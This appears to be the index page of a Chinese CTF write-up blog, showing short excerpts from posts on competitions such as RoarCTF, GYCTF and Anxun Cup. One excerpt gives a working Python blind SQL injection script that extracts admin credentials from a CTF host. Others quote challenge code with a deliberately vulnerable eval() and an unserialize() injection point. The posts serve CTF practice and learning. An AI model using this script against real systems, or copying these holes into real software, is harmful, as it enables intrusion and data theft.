MySQL服务端恶意读取客户端文件漏洞

这个洞之前ddctf出过一次,但是那时候太菜了,根本看不懂,现在前几天的比赛又出了一个这样的,但是当时没看题,没得源码,看wp还是挺简单的
p3师傅说源码很少,我直接看着wp复现吧(狗头)
https://www.cnblogs.com/BOHB-yunying/p/10820453.html

Mehr lesen

xctf3月赛

队里师傅都太强了,我只配端茶倒水,基本看着师傅们写的文档复现

Mehr lesen

De1CTF-2019刷题记录

水了好几天,今天刷刷题

Mehr lesen

2.29考核赛

对不起我太菜了,只出了最简单的一题

附赵师傅的wp和p3师傅的wp

Mehr lesen

RoarCTF 2019

Easy Calc

给了一个计算器,calc.php源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php 
error_reporting(0);
if(!isset($_GET['num'])){
show_source(__FILE__);
}else{
$str = $_GET['num'];
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $str)) {
die("what are you want to do?");
}
}
eval('echo '.$str.';');
}
?>

Mehr lesen

安恒2.26月赛

本来直接去看了一道200分的题感觉太简单了,就不打算做了。
结果看其他题的时候感觉还是需要做个笔记的233

Mehr lesen

从GYCTF的两道题中学习node

比赛的时候突然出来这两道node.js的题,给我整懵了,第一次见,然后就开始了node.js从开始到放弃之路
主要是看的p神的博客学的
还有哲哥给我发的这篇翻译来的文章
学的时候有很多不懂得地方,多亏哲哥
Node.js常见漏洞学习与总结

Mehr lesen

2020GYCTF

day1

第一天的题整体比较简单

Mehr lesen

今日份sql

Black Watch 入群题

盲注,过滤了空格注释符,脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
import requests
import time
i=1
n=2
flag=""
for i in range(10,18):
print(i)
m=64
j=64
for q in range(1,8):
if q!=1:
j=j/2
if n==1:
m=m+j
elif n==0:
m=m-j
m=int(m)
#payload="""1^(if((ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1))>{}),1,0))^1""".format(i,m)
#admin,contents
#payload="""1^if((ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),{},1))>{}),1,0)^1""".format(i,m)
#id,username,password,is_enable
payload="""1^if((ascii(substr((select(group_concat(username))from(admin)),{},1))>{}),1,0)^1""".format(i,m)
#f80e656a,5676a826 073dc863,ca8490c4
url="http://e9f8d063-241c-4f7c-aea6-3afac8c5a33f.node3.buuoj.cn/backend/content_detail.php?id={}".format(payload)
time.sleep(0.15)
p=requests.get(url)
if "title" in p.text:
n=1
else:
n=0
if q==7:
if "title" in p.text:
flag=flag+chr(m+1)
else:
flag=flag+chr(m)
print(flag)

Mehr lesen

2019安洵杯刷题记录

不是文件上传

主页页脚有wowouploadimage,github搜索这个名称,即可找到源码。
下载之后分析,发现show.php存在反序列化点

1
2
3
4
5
6
7
8
$sql = "SELECT * FROM images";
$result = mysqli_query($this->con, $sql);
if ($result->num_rows > 0){
while($row = $result->fetch_assoc()){
if($row["attr"]){
$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
$attr = unserialize($attr_temp);
}

Mehr lesen